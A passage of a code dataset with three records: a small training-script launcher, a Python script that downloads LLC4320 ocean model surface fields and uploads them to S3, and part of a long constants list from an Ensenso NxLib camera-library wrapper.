argparse\nfrom train import *\n\ndef parse_args():\n parser = argparse.ArgumentParser(description=\"SPDS_FinalPJT\", formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument(\"--batchsize\", default=25, type=int, dest=\"batchsize\") \n parser.add_argument(\"--epochs\", default=10, type=int, dest=\"epochs\")\n parser.add_argument(\"--train_dir\", default=\"/home/spds066/rps/\", type=str, dest=\"train_dir\")\n parser.add_argument(\"--val_dir\", default=\"/home/spds066/rps-test-set/\", type=str, dest=\"val_dir\")\n return parser.parse_args()\n\n\ndef main():\n args = parse_args()\n train(args)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"task1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"201923918","text":"import time\nimport os\nimport h5py\nimport numpy as np\nimport pandas as pd\nfrom tqdm.auto import trange\nimport argparse\n\n\nimport torch\n\nimport xmitgcm.llcreader as llcreader\n\nfrom ulmo.llc.slurp import write_xr\nfrom ulmo import io as ulmo_io\n\nfrom IPython import embed\n\ndef parse_option():\n \"\"\"\n This is a function used to parse the arguments in the training.\n Returns:\n args: (dict) dictionary of the arguments.\n \"\"\"\n parser = argparse.ArgumentParser(\"LLC SSH\")\n parser.add_argument(\"--task\", type=str,\n help=\"task to execute: 'download','evaluate', 'umap'.\")\n parser.add_argument(\"--istart\", type=int, default=0,\n help=\"Starting file\")\n #parser.add_argument(\"--n_cores\", type=int, help=\"Number of CPU to use\")\n #parser.add_argument(\"--day\", type=int, default=1, help=\"Day to start extraction from\")\n args = parser.parse_args()\n\n return args\n\ndef llc_download(pargs, model_name='LLC4320', tstep=6, \n varnames=['Theta','U','V','W','Salt','Eta',\n 'oceTAUX','oceTAUY'],\n clobber=False): \n if model_name == 'LLC4320':\n model = llcreader.ECCOPortalLLC4320Model()\n tstep_hr = 144 # Time steps per hour\n\n # Get dataset\n iter_step = tstep_hr*tstep\n ds = model.get_dataset(\n varnames=varnames, k_levels=[0], type='latlon', \n iter_step=iter_step)\n\n tsize = ds.time.size\n print(\"Model is ready\")\n\n # Check for existing files\n s3_path = f'/data/{tstep}-hour/'\n s3_files = ulmo_io.list_of_bucket_files('llc',\n prefix=s3_path)\n if len(s3_files) > 0:\n s3_files = ['s3://llc/'+ifile for ifile in s3_files]\n\n # Loop me\n for tt in range(pargs.istart, tsize):\n # Get dataset\n iter_step = tstep_hr*tstep\n ds = model.get_dataset(varnames=varnames,\n k_levels=[0], type='latlon',\n iter_step=iter_step)\n #\n print(\"Time step = {} of {}\".format(tt, ds.time.size))\n\n ds_0 = ds.isel(time=tt, k=0) \n # Generate outfile name\n outfile = '{:s}_{:s}.nc'.format(model_name,\n str(ds_0.time.values)[:19].replace(':','_'))\n s3_file = 's3://llc'+s3_path+outfile\n # No clobber\n if not clobber and s3_file in s3_files:\n print(\"Not clobbering: {}\".format(s3_file))\n continue\n # Write\n write_xr(ds_0, outfile)\n print(\"Wrote: {}\".format(outfile))\n\n # Push to s3\n ulmo_io.upload_file_to_s3(outfile, s3_file)\n\n # Clean up\n del(ds)\n os.remove(outfile)\n\nif __name__ == \"__main__\":\n # get the argument of training.\n pargs = parse_option()\n \n # run the 'extract_curl()' function.\n if pargs.task == 'download':\n print(\"Download starts.\")\n llc_download(pargs)\n print(\"Download Ends.\")\n ","sub_path":"ulmo/runs/LLC/ssh/llc_ssh.py","file_name":"llc_ssh.py","file_ext":"py","file_size_in_byte":2960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"147313915","text":"import json\n\nfrom .exception import NxLibError as _NxLibError\nfrom .command import NxLibCommand as _NxLibCommand\nfrom .helper import convert_camel_to_upper_snake as _convert_camel_to_upper_snake\nfrom .helper import fix_nxlib_prefix as _fix_nxlib_prefix\n\nNXLIB_ITEM_SEPARATOR = '/'\nNXLIB_INDEX_ESCAPE_CHAR = '\\\\'\nNXLIB_ITEM_FORBIDDEN_CHARS = \"\\r\\n\\\"/\\\\\\0\"\n\nNXLIB_BAD_REQUEST = 11\nNXLIB_BUFFER_NOT_DIVISIBLE_BY_ELEMENT_SIZE = 16\nNXLIB_BUFFER_TOO_SMALL = 15\nNXLIB_CANNOT_CREATE_ITEM = 1\nNXLIB_COMMAND_RUNNING = 19\nNXLIB_CONNECTION_NOT_COMPATIBLE = 22\nNXLIB_COULD_NOT_INTERPRET_JSON_TEXT = 2\nNXLIB_COULD_NOT_LOAD_FUNCTION = 21\nNXLIB_COULD_NOT_LOAD_LIBRARY = 20\nNXLIB_COULD_NOT_OPEN_PORT = 6\nNXLIB_DEBUG_MESSAGE_OVERFLOW = 18\nNXLIB_EXECUTION_FAILED = 17\nNXLIB_INITIALIZATION_NOT_ALLOWED = 23\nNXLIB_INTERNAL_ERROR = 7\nNXLIB_INVALID_BUFFER_SIZE = 14\nNXLIB_ITEM_INEXISTENT = 3\nNXLIB_ITEM_TYPE_NOT_COMPATIBLE = 13\nNXLIB_METHOD_INVALID = 10\nNXLIB_NESTING_LIMIT_REACHED = 24\nNXLIB_NO_DEBUG_DATA = 5\nNXLIB_NO_OPEN_PROFILE_BLOCK = 25\nNXLIB_NOT_CONNECTED = 9\nNXLIB_OPERATION_SUCCEEDED = 0\nNXLIB_TIMEOUT = 8\nCMD_ADAPTER_CONFIGURATION = \"AdapterConfiguration\"\nCMD_ADD_PATTERN_BUFFER_VIEW = \"AddPatternBufferView\"\nCMD_ADJUST_EXPOSURE_AND_GAIN = \"AdjustExposureAndGain\"\nCMD_BREAK = \"Break\"\nCMD_CALIBRATE = \"Calibrate\"\nCMD_CALIBRATE_HAND_EYE = \"CalibrateHandEye\"\nCMD_CALIBRATE_IN_BACKGROUND = \"CalibrateInBackground\"\nCMD_CALIBRATE_PATTERN = \"CalibratePattern\"\nCMD_CALIBRATE_UPDATE_PATTERNS = \"CalibrateUpdatePatterns\"\nCMD_CALIBRATE_WORKSPACE = \"CalibrateWorkspace\"\nCMD_CAPTURE = \"Capture\"\nCMD_CHAIN_TRANSFORMATIONS = \"ChainTransformations\"\nCMD_CLEAR_IMAGE_BUFFER = \"ClearImageBuffer\"\nCMD_CLEAR_IMAGES = \"ClearImages\"\nCMD_CLEAR_OVERLAY = \"ClearOverlay\"\nCMD_CLOSE = \"Close\"\nCMD_COLLECT_PATTERN = \"CollectPattern\"\nCMD_COLLECT_PLANE_POINTS = \"CollectPlanePoints\"\nCMD_COMPUTE_DISPARITY_MAP = \"ComputeDisparityMap\"\nCMD_COMPUTE_IMAGE_CONTRAST = \"ComputeImageContrast\"\nCMD_COMPUTE_NORMALS = \"ComputeNormals\"\nCMD_COMPUTE_POINT_MAP = \"ComputePointMap\"\nCMD_CONVERT_TRANSFORMATION = \"ConvertTransformation\"\nCMD_CREATE_CAMERA = \"CreateCamera\"\nCMD_DELETE_CAMERA = \"DeleteCamera\"\nCMD_DISCARD_PATTERNS = \"DiscardPatterns\"\nCMD_ESTIMATE_DISPARITY_SETTINGS = \"EstimateDisparitySettings\"\nCMD_ESTIMATE_PATTERN_POSE = \"EstimatePatternPose\"\nCMD_ETHERNET_CONFIGURATION = \"EthernetConfiguration\"\nCMD_FILTER_PATTERN_BUFFER = \"FilterPatternBuffer\"\nCMD_FIT_PRIMITIVE = \"FitPrimitive\"\nCMD_FLASH = \"Flash\"\nCMD_GENERATE_CALIBRATION_PATTERN = \"GenerateCalibrationPattern\"\nCMD_GET_CONSTANTS = \"GetConstants\"\nCMD_GET_MODEL_INFO = \"GetModelInfo\"\nCMD_GET_PATTERN_BUFFER = \"GetPatternBuffer\"\nCMD_GET_PATTERN_BUFFERS = \"GetPatternBuffers\"\nCMD_GET_RAW_CALIBRATION_DATA = \"GetRawCalibrationData\"\nCMD_INTERNAL_PWM = \"InternalPwm\"\nCMD_LOAD_CALIBRATION = \"LoadCalibration\"\nCMD_LOAD_IMAGE = \"LoadImage\"\nCMD_LOAD_TEXT = \"LoadText\"\nCMD_LOAD_U_EYE_PARAMETER_SET = \"LoadUEyeParameterSet\"\nCMD_MEASURE_CALIBRATION = \"MeasureCalibration\"\nCMD_NETWORK_CONTROL = \"NetworkControl\"\nCMD_OPEN = \"Open\"\nCMD_PATTERN_BUFFER_INFO = \"PatternBufferInfo\"\nCMD_PROJECT_PATTERN = \"ProjectPattern\"\nCMD_RECALIBRATE = \"Recalibrate\"\nCMD_RECTIFY_IMAGES = \"RectifyImages\"\nCMD_REDUCE_PATTERN_BUFFER = \"ReducePatternBuffer\"\nCMD_REDUCE_PATTERNS = \"ReducePatterns\"\nCMD_REMOVE_PATTERN_BUFFER_VIEW = \"RemovePatternBufferView\"\nCMD_RENDER_DEPTH_MAP = \"RenderDepthMap\"\nCMD_RENDER_POINT_MAP = \"RenderPointMap\"\nCMD_RENDER_VIEW = \"RenderView\"\nCMD_RETRIEVE = \"Retrieve\"\nCMD_SAVE_IMAGE = \"SaveImage\"\nCMD_SAVE_MODEL = \"SaveModel\"\nCMD_SAVE_TEXT = \"SaveText\"\nCMD_SET_PATTERN_BUFFER = \"SetPatternBuffer\"\nCMD_SET_PATTERN_BUFFERS = \"SetPatternBuffers\"\nCMD_SET_STATUS_LEDS = \"SetStatusLeds\"\nCMD_SIMULATE_PHYSICS = \"SimulatePhysics\"\nCMD_STORE_CALIBRATION = \"StoreCalibration\"\nCMD_SYNCHRONIZE = \"Synchronize\"\nCMD_TRIGGER = \"Trigger\"\nCMD_UPDATE_FIRMWARE = \"UpdateFirmware\"\nCMD_VISUALIZE_PATTERN_BUFFER = \"VisualizePatternBuffer\"\nERR_CALIBRATION_FAILED = \"CalibrationFailed\"\nERR_CAMERA_NOT_FOUND = \"CameraNotFound\"\nERR_CHANGED_MODEL = \"ChangedModel\"\nERR_COMMAND_NOT_ALLOWED = \"CommandNotAllowed\"\nERR_COMMAND_UNKNOWN = \"CommandUnknown\"\nERR_EMPTY_IMAGE = \"EmptyImage\"\nERR_INVALID_CALIBRATION_DATA = \"InvalidCalibrationData\"\nERR_INVALID_PAIRING_DATA = \"InvalidPairingData\"\nERR_INVALID_PATTERN_BUFFER = \"InvalidPatternBuffer\"\nERR_NO_WORKSPACE_LINK = \"NoWorkspaceLink\"\nERR_NOT_ENOUGH_POINTS_FOR_PRIMITIVE = \"NotEnoughPointsForPrimitive\"\nERR_OPERATION_CANCELED = \"OperationCanceled\"\nERR_PATTERN_BUFFER_LOCKED = \"PatternBufferLocked\"\nERR_PATTERN_DATA_INCOMPATIBLE = \"PatternDataIncompatible\"\nERR_PATTERN_NOT_DECODABLE = \"PatternNotDecodable\"\nERR_PATTERN_NOT_FOUND = \"PatternNotFound\"\nERR_SENSOR_NOT_COMPATIBLE = \"SensorNotCompatible\"\nERR_UNHANDLED_EXCEPTION = \"UnhandledException\"\nERR_WIRING_TEST_FAILED = \"WiringTestFailed\"\nNXLIB_ITEM_TYPE_ARRAY = 5\nNXLIB_ITEM_TYPE_BOOL = 4\nNXLIB_ITEM_TYPE_INVALID = 0\nNXLIB_ITEM_TYPE_NULL = 1\nNXLIB_ITEM_TYPE_NUMBER = 2\nNXLIB_ITEM_TYPE_OBJECT = 6\nNXLIB_ITEM_TYPE_STRING = 3\nITM_ABSOLUTE_BLACK_LEVEL_OFFSET = \"AbsoluteBlackLevelOffset\"\nITM_ACTIVE = \"Active\"\nITM_ADAPTERS = \"Adapters\"\nITM_ADJUST_EXPOSURE = \"AdjustExposure\"\nITM_ADJUST_GAIN = \"AdjustGain\"\nITM_ALIGN_AXIS = \"AlignAxis\"\nITM_ALL = \"All\"\nITM_ALLOW_FIRMWARE_UPLOAD = \"AllowFirmwareUpload\"\nITM_AMBIENT = \"Ambient\"\nITM_AND = \"And\"\nITM_ANGLE = \"Angle\"\nITM_ANGLES = \"Angles\"\nITM_APERTURE = \"Aperture\"\nITM_API_ERRORS = \"ApiErrors\"\nITM_APPLICATION = \"Application\"\nITM_APPLY = \"Apply\"\nITM_ARCHITECTURE = \"Architecture\"\nITM_AREA_OF_INTEREST = \"AreaOfInterest\"\nITM_ASSEMBLY_CALIBRATION = \"AssemblyCalibration\"\nITM_ASSEMBLY_PATTERN = \"AssemblyPattern\"\nITM_ASYNCHRONOUSLY_TRIGGERED = \"AsynchronouslyTriggered\"\nITM_AUTO_BLACK_LEVEL = \"AutoBlackLevel\"\nITM_AUTO_EXPOSURE = \"AutoExposure\"\nITM_AUTO_FOCUS = \"AutoFocus\"\nITM_AUTO_GAIN = \"AutoGain\"\nITM_AUTO_SWAP = \"AutoSwap\"\nITM_AUTOMATIC = \"Automatic\"\nITM_AVAILABLE = \"Available\"\nITM_AVERAGE = \"Average\"\nITM_AVERAGE_POSE_ERROR = \"AveragePoseError\"\nITM_AXIS = \"Axis\"\nITM_BACKGROUND = \"Background\"\nITM_BANDWIDTH = \"Bandwidth\"\nITM_BANDWIDTH_LIMIT = \"BandwidthLimit\"\nITM_BASELINE = \"Baseline\"\nITM_BINARY_INFO = \"BinaryInfo\"\nITM_BINNING = \"Binning\"\nITM_BINNING_SHIFT = \"BinningShift\"\nITM_BLACK_LEVEL_OFFSET = \"BlackLevelOffset\"\nITM_BLACK_LEVEL_OFFSET_CALIBRATION = \"BlackLevelOffsetCalibration\"\nITM_BLIND = \"Blind\"\nITM_BLUR = \"Blur\"\nITM_BLUR_MIN_MAX = \"BlurMinMax\"\nITM_BOARD = \"Board\"\nITM_BOOTLOADER = \"Bootloader\"\nITM_BORDER_SPREAD = \"BorderSpread\"\nITM_BOUNDING_BOX = \"BoundingBox\"\nITM_BRIGHTNESS = \"Brightness\"\nITM_BUFFER = \"Buffer\"\nITM_BUFFER_COUNT = \"BufferCount\"\nITM_BUFFER_SIZE = \"BufferSize\"\nITM_BUILD = \"Build\"\nITM_BY_EEPROM_ID = \"ByEepromId\"\nITM_BY_SERIAL_NO = \"BySerialNo\"\nITM_CPU = \"CPU\"\nITM_CRC_ERROR_COUNT = \"CRCErrorCount\"\nITM_CUDA = \"CUDA\"\nITM_CAL_TAB_TYPE = \"CalTabType\"\nITM_CAL_TABS = \"CalTabs\"\nITM_CALCULATE_IP = \"CalculateIp\"\nITM_CALIBRATED = \"Calibrated\"\nITM_CALIBRATION = \"Calibration\"\nITM_CALIBRATION_FILE = \"CalibrationFile\"\nITM_CALIBRATION_HISTORY = \"CalibrationHistory\"\nITM_CAMERA = \"Camera\"\nITM_CAMERAS = \"Cameras\"\nITM_CAPTURE = \"Capture\"\nITM_CAPTURE_EVENTS = \"CaptureEvents\"\nITM_CENTER = \"Center\"\nITM_CHECK = \"Check\"\nITM_CHECK_DAEMON = \"CheckDaemon\"\nITM_CLEAR_IMAGE_BUFFER_ON_TRIGGER = \"ClearImageBufferOnTrigger\"\nITM_CLOCK_RATE = \"ClockRate\"\nITM_CODE_METER = \"CodeMeter\"\nITM_COLOR = \"Color\"\nITM_COLOR_OFFSET = \"ColorOffset\"\nITM_COLOR_REPETITION_DISTANCE = \"ColorRepetitionDistance\"\nITM_COMMAND = \"Command\"\nITM_COMMANDS = \"Commands\"\nITM_COMMON_ITEMS = \"CommonItems\"\nITM_COMMON_VALUES = \"CommonValues\"\nITM_COMPONENT_THRESHOLD = \"ComponentThreshold\"\nITM_COMPUTE_CAPABILITY = \"ComputeCapability\"\nITM_COMPUTE_DISPARITY_MAP = \"ComputeDisparityMap\"\nITM_CONFIGURATION = \"Configuration\"\nITM_CONNECTED = \"Connected\"\nITM_CONNECTED_CAMERAS = \"ConnectedCameras\"\nITM_CONNECTED_PATTERNS = \"ConnectedPatterns\"\nITM_CONTENT = \"Content\"\nITM_CONTRAST = \"Contrast\"\nITM_CORES = \"Cores\"\nITM_COST_SCALE = \"CostScale\"\nITM_COUNT = \"Count\"\nITM_DHCP = \"DHCP\"\nITM_DAY = \"Day\"\nITM_DEBUG = \"Debug\"\nITM_DECODE_DATA = \"DecodeData\"\nITM_DEFAULT = \"Default\"\nITM_DEFAULT_GATEWAY = \"DefaultGateway\"\nITM_DEFAULT_PARAMETERS = \"DefaultParameters\"\nITM_DEFINED_POSE = \"DefinedPose\"\nITM_DEPTH = \"Depth\"\nITM_DEPTH_CHANGE_COST = \"DepthChangeCost\"\nITM_DEPTH_STEP_COST = \"DepthStepCost\"\nITM_DESTINATION = \"Destination\"\nITM_DEVICE = \"Device\"\nITM_DEVICES = \"Devices\"\nITM_DIFFUSE = \"Diffuse\"\nITM_DIRECTION = \"Direction\"\nITM_DISPARITY = \"Disparity\"\nITM_DISPARITY_ACCURACY = \"DisparityAccuracy\"\nITM_DISPARITY_MAP = \"DisparityMap\"\nITM_DISPARITY_MAP_OFFSET = \"DisparityMapOffset\"\nITM_DISPARITY_STEP = \"DisparityStep\"\nITM_DISTANCE = \"Distance\"\nITM_DISTORTION = \"Distortion\"\nITM_DOWNLOAD_IMAGES = \"DownloadImages\"\nITM_DOWNSAMPLE = \"Downsample\"\nITM_DRAW_AXES = \"DrawAxes\"\nITM_DRAW_ONLY = \"DrawOnly\"\nITM_DRAW_ORIGIN = \"DrawOrigin\"\nITM_DRIVER = \"Driver\"\nITM_DURATION = \"Duration\"\nITM_DUTY_CYCLE = \"DutyCycle\"\nITM_DYNAMIC = \"Dynamic\"\nITM_DYNAMIC_CALIBRATION_LIMIT_REACHED = \"DynamicCalibrationLimitReached\"\nITM_DYNAMIC_OFFSETS = \"DynamicOffsets\"\nITM_EEPROM_FORMAT = \"EepromFormat\"\nITM_EEPROM_ID = \"EepromId\"\nITM_ENABLE_IP_FILTER = \"EnableIpFilter\"\nITM_ENABLED = \"Enabled\"\nITM_ENCODING = \"Encoding\"\nITM_EPIPOLAR = \"Epipolar\"\nITM_EPIPOLAR_ERROR = \"EpipolarError\"\nITM_ERROR_SYMBOL = \"ErrorSymbol\"\nITM_ERROR_TEXT = \"ErrorText\"\nITM_ERRORS = \"Errors\"\nITM_ESTIMATE_GRID_SPACING = \"EstimateGridSpacing\"\nITM_ETHERNET = \"Ethernet\"\nITM_ETHERNET_CONFIG_MODE = \"EthernetConfigMode\"\nITM_EXECUTE = \"Execute\"\nITM_EXPOSURE = \"Exposure\"\nITM_EXT = \"Ext\"\nITM_EXTENDED_TYPE = \"ExtendedType\"\nITM_FACTORY = \"Factory\"\nITM_FAILURE_PROBABILITY = \"FailureProbability\"\nITM_FAR = \"Far\"\nITM_FILE_OUTPUT = \"FileOutput\"\nITM_FILE_PREFIX = \"FilePrefix\"\nITM_FILENAME = \"Filename\"\nITM_FILL_XY_COORDINATES = \"FillXYCoordinates\"\nITM_FILLING = \"Filling\"\nITM_FILTER = \"Filter\"\nITM_FILTERS = \"Filters\"\nITM_FINAL_TRIGGER = \"FinalTrigger\"\nITM_FIRMWARE_UPLOAD = \"FirmwareUpload\"\nITM_FIRMWARE_VERSION = \"FirmwareVersion\"\nITM_FIXED = \"Fixed\"\nITM_FLAGS = \"Flags\"\nITM_FLASH_DELAY = \"FlashDelay\"\nITM_FLEX_VIEW = \"FlexView\"\nITM_FOCAL_LENGTH = \"FocalLength\"\nITM_FOCUS = \"Focus\"\nITM_FOCUS_DISTANCE = \"FocusDistance\"\nITM_FOLDER_PATH = \"FolderPath\"\nITM_FOLLOW_DYNAMIC_OFFSETS = \"FollowDynamicOffsets\"\nITM_FONT = \"Font\"\nITM_FORCE = \"Force\"\nITM_FORCE_GRAYSCALE = \"ForceGrayscale\"\nITM_FORCED_RAW_IMAGE_SIZE = \"ForcedRawImageSize\"\nITM_FORCED_RECTIFIED_IMAGE_SIZE = \"ForcedRectifiedImageSize\"\nITM_FREQUENCY = \"Frequency\"\nITM_FROM_DYNAMIC = \"FromDynamic\"\nITM_FRONT_LIGHT = \"FrontLight\"\nITM_GAIN = \"Gain\"\nITM_GAIN_BOOST = \"GainBoost\"\nITM_GATEWAY = \"Gateway\"\nITM_GENERATE_EMPTY_CALIBRATION = \"GenerateEmptyCalibration\"\nITM_GLOBAL_PATTERN_DATA_UPDATED = \"GlobalPatternDataUpdated\"\nITM_GLOBAL_SHUTTER = \"GlobalShutter\"\nITM_GLOW = \"Glow\"\nITM_GRAVITY = \"Gravity\"\nITM_GREEN = \"Green\"\nITM_GRID_SIZE = \"GridSize\"\nITM_GRID_SPACING = \"GridSpacing\"\nITM_GROUND_PLANE = \"GroundPlane\"\nITM_HUD = \"HUD\"\nITM_HALF_VERGENCE = \"HalfVergence\"\nITM_HARDWARE_FAILURE = \"HardwareFailure\"\nITM_HARDWARE_GAMMA = \"HardwareGamma\"\nITM_HAS_LICENSE = \"HasLicense\"\nITM_HASH = \"Hash\"\nITM_HDR = \"Hdr\"\nITM_HEIGHT = \"Height\"\nITM_HIGH_QUALITY_RENDERING = \"HighQualityRendering\"\nITM_HORIZONTAL = \"Horizontal\"\nITM_IO = \"IO\"\nITM_IGNORE_ENSENSO_PATTERN_ENCODING = \"IgnoreEnsensoPatternEncoding\"\nITM_IMAGE_BUFFER = \"ImageBuffer\"\nITM_IMAGE_DOWNLOAD_LIMIT = \"ImageDownloadLimit\"\nITM_IMAGE_FOLDER = \"ImageFolder\"\nITM_IMAGE_NAME = \"ImageName\"\nITM_IMAGE_OFFSET = \"ImageOffset\"\nITM_IMAGE_SET = \"ImageSet\"\nITM_IMAGE_SIZE = \"ImageSize\"\nITM_IMAGES = \"Images\"\nITM_INDEX = \"Index\"\nITM_INFO = \"Info\"\nITM_INFO_TIMEOUT = \"InfoTimeout\"\nITM_INITIAL_TRIGGER = \"InitialTrigger\"\nITM_INITIAL_VELOCITY = \"InitialVelocity\"\nITM_INLIER_COUNT = \"InlierCount\"\nITM_INLIER_FRACTION = \"InlierFraction\"\nITM_INLIER_THRESHOLD = \"InlierThreshold\"\nITM_INPUT = \"Input\"\nITM_INTEGRATED = \"Integrated\"\nITM_INTERFACE = \"Interface\"\nITM_INTERNAL_TRIGGER = \"InternalTrigger\"\nITM_INTERVAL = \"Interval\"\nITM_INVERSE = \"Inverse\"\nITM_INVERT = \"Invert\"\nITM_IP_ADDRESS = \"IpAddress\"\nITM_IP_BROADCAST = \"IpBroadcast\"\nITM_IP_SUBNET_MASK = \"IpSubnetMask\"\nITM_ITEM_TYPES = \"ItemTypes\"\nITM_ITEMS = \"Items\"\nITM_ITERATIONS = \"Iterations\"\nITM_K1 = \"K1\"\nITM_K2 = \"K2\"\nITM_K3 = \"K3\"\nITM_KEEP_ALIVE_TIMEOUT = \"KeepAliveTimeout\"\nITM_LED = \"LED\"\nITM_LATEST_MESSAGE = \"LatestMessage\"\nITM_LEFT = \"Left\"\nITM_LEFT_BOTTOM = \"LeftBottom\"\nITM_LEFT_TOP = \"LeftTop\"\nITM_LENS = \"Lens\"\nITM_LENSES = \"Lenses\"\nITM_LEVEL = \"Level\"\nITM_LIGHTING = \"Lighting\"\nITM_LINK = \"Link\"\nITM_LINKS = \"Links\"\nITM_LIST_CAL_TABS = \"ListCalTabs\"\nITM_LIST_LENSES = \"ListLenses\"\nITM_LIST_MODELS = \"ListModels\"\nITM_LIST_PATTERNS = \"ListPatterns\"\nITM_LIST_SENSORS = \"ListSensors\"\nITM_LOAD_CALIBRATION = \"LoadCalibration\"\nITM_LOCAL_EEPROM_FILE = \"LocalEepromFile\"\nITM_LOW_BANDWIDTH = \"LowBandwidth\"\nITM_MAC = \"MAC\"\nITM_MAC_ADDRESSES = \"MacAddresses\"\nITM_MAJOR = \"Major\"\nITM_MARK_FILTER_REGIONS = \"MarkFilterRegions\"\nITM_MARK_ONLY = \"MarkOnly\"\nITM_MASK = \"Mask\"\nITM_MASS = \"Mass\"\nITM_MASTER = \"Master\"\nITM_MATERIAL_BLUR = \"MaterialBlur\"\nITM_MAX = \"Max\"\nITM_MAX_EEPROM_FORMAT = \"MaxEepromFormat\"\nITM_MAX_FILE_SIZE = \"MaxFileSize\"\nITM_MAX_FLASH_TIME = \"MaxFlashTime\"\nITM_MAX_GAIN = \"MaxGain\"\nITM_MAX_POSE_ERROR = \"MaxPoseError\"\nITM_MAX_TOTAL_SIZE = \"MaxTotalSize\"\nITM_MAXIMUM_TRANSMISSION_UNIT = \"MaximumTransmissionUnit\"\nITM_MEASURE_CALIBRATION = \"MeasureCalibration\"\nITM_MEASURE_CONTRAST = \"MeasureContrast\"\nITM_MEASUREMENT_VOLUME = \"MeasurementVolume\"\nITM_MEDIAN_FILTER_RADIUS = \"MedianFilterRadius\"\nITM_MEMORY = \"Memory\"\nITM_MESSAGE = \"Message\"\nITM_MESSAGES = \"Messages\"\nITM_META_DATA = \"MetaData\"\nITM_META_INFO = \"MetaInfo\"\nITM_METHOD = \"Method\"\nITM_MIN = \"Min\"\nITM_MIN_DISPARITY = \"MinDisparity\"\nITM_MINIMUM_DISPARITY = \"MinimumDisparity\"\nITM_MINIMUM_VOLTAGE = \"MinimumVoltage\"\nITM_MINOR = \"Minor\"\nITM_MIRROR = \"Mirror\"\nITM_MODE = \"Mode\"\nITM_MODEL_NAME = \"ModelName\"\nITM_MODELS = \"Models\"\nITM_MONO_INTRINSIC = \"MonoIntrinsic\"\nITM_MONOCULAR = \"Monocular\"\nITM_MONOCULAR_CALIBRATION = \"MonocularCalibration\"\nITM_MONOCULAR_PATTERN_COUNT = \"MonocularPatternCount\"\nITM_MONTH = \"Month\"\nITM_MULTI_EXPOSURE_FACTOR = \"MultiExposureFactor\"\nITM_NAME = \"Name\"\nITM_NEAR = \"Near\"\nITM_NETWORK_ADAPTER = \"NetworkAdapter\"\nITM_NETWORK_ADAPTER_IP_ADDRESS = \"NetworkAdapterIpAddress\"\nITM_NETWORK_ADAPTER_IP_SUBNET_MASK = \"NetworkAdapterIpSubnetMask\"\nITM_NETWORK_TYPE = \"NetworkType\"\nITM_NODE = \"Node\"\nITM_NODES = \"Nodes\"\nITM_NOISE_LEVEL = \"NoiseLevel\"\nITM_NORMAL = \"Normal\"\nITM_NORMALS = \"Normals\"\nITM_NUMBER_OF_DISPARITIES = \"NumberOfDisparities\"\nITM_NUMBER_OF_IMAGE_SETS = \"NumberOfImageSets\"\nITM_NX_LIB = \"NxLib\"\nITM_OBJECT_POINTS = \"ObjectPoints\"\nITM_OBJECTS = \"Objects\"\nITM_OFFSET = \"Offset\"\nITM_OPEN = \"Open\"\nITM_OPEN_MP = \"OpenMP\"\nITM_OPERATING_SYSTEM = \"OperatingSystem\"\nITM_OPERATION = \"Operation\"\nITM_OPTICAL_AXIS = \"OpticalAxis\"\nITM_OPTIMIZATION_PROFILE = \"OptimizationProfile\"\nITM_OPTIONS = \"Options\"\nITM_OR = \"Or\"\nITM_OUTER_SIZE = \"OuterSize\"\nITM_OUTPUT = \"Output\"\nITM_OVERFLOW_POLICY = \"OverflowPolicy\"\nITM_OVERLAY = \"Overlay\"\nITM_OVERTEMPERATURE = \"Overtemperature\"\nITM_OVERWRITE_WITH_DYNAMIC = \"OverwriteWithDynamic\"\nITM_PACKETS_RESENT = \"PacketsResent\"\nITM_PADDING = \"Padding\"\nITM_PAIRED = \"Paired\"\nITM_PARAMETERS = \"Parameters\"\nITM_PATTERN = \"Pattern\"\nITM_PATTERN_BUFFER = \"PatternBuffer\"\nITM_PATTERN_COUNT = \"PatternCount\"\nITM_PATTERN_POSE = \"PatternPose\"\nITM_PATTERN_TYPE = \"PatternType\"\nITM_PATTERN_VOLUME = \"PatternVolume\"\nITM_PATTERNS = \"Patterns\"\nITM_PERSISTENT_OVERLAY = \"PersistentOverlay\"\nITM_PERSISTENT_PARAMETERS = \"PersistentParameters\"\nITM_PHASE_INTERPOLATION = \"PhaseInterpolation\"\nITM_PHYSICS = \"Physics\"\nITM_PIXEL_CLOCK = \"PixelClock\"\nITM_PIXEL_PITCH = \"PixelPitch\"\nITM_PIXEL_SIZE = \"PixelSize\"\nITM_PLANE = \"Plane\"\nITM_PLUGGED = \"Plugged\"\nITM_POINT_MAP = \"PointMap\"\nITM_POINTS = \"Points\"\nITM_POLARITY = \"Polarity\"\nITM_PORT = \"Port\"\nITM_POSE = \"Pose\"\nITM_POSE_ERROR = \"PoseError\"\nITM_POSES = \"Poses\"\nITM_POST_PROCESSING = \"PostProcessing\"\nITM_PRIMITIVE = \"Primitive\"\nITM_PROGRESS = \"Progress\"\nITM_PROGRESS_FACTOR = \"ProgressFactor\"\nITM_PROGRESS_GRID = \"ProgressGrid\"\nITM_PROGRESS_MASK = \"ProgressMask\"\nITM_PROGRESS_MASK_FACTOR = \"ProgressMaskFactor\"\nITM_PROGRESS_MODE = \"ProgressMode\"\nITM_PROJECTOR = \"Projector\"\nITM_PROJECTOR_DUTY_CYCLE = \"ProjectorDutyCycle\"\nITM_PROJECTOR_PATTERN = \"ProjectorPattern\"\nITM_PROJECTOR_POWER = \"ProjectorPower\"\nITM_PROPAGATION_DECAY = \"PropagationDecay\"\nITM_PROTECTION = \"Protection\"\nITM_RADIUS = \"Radius\"\nITM_RAW = \"Raw\"\nITM_RAW_AOI_INCREMENTS = \"RawAoiIncrements\"\nITM_RECALIBRATE = \"Recalibrate\"\nITM_RECTIFICATION = \"Rectification\"\nITM_RECTIFIED = \"Rectified\"\nITM_REDUCE = \"Reduce\"\nITM_REDUCED = \"Reduced\"\nITM_REFINEMENT = \"Refinement\"\nITM_REGION = \"Region\"\nITM_REGION_FILTER_DOWNSAMPLING = \"RegionFilterDownsampling\"\nITM_REGION_SIZE = \"RegionSize\"\nITM_RELATIVE = \"Relative\"\nITM_RELATIVE_AVERAGE_POSE_ERROR = \"RelativeAveragePoseError\"\nITM_RELATIVE_MAX_POSE_ERROR = \"RelativeMaxPoseError\"\nITM_REMOTE = \"Remote\"\nITM_RENDER_DEPTH_MAP = \"RenderDepthMap\"\nITM_RENDER_GROUND_TRUTH = 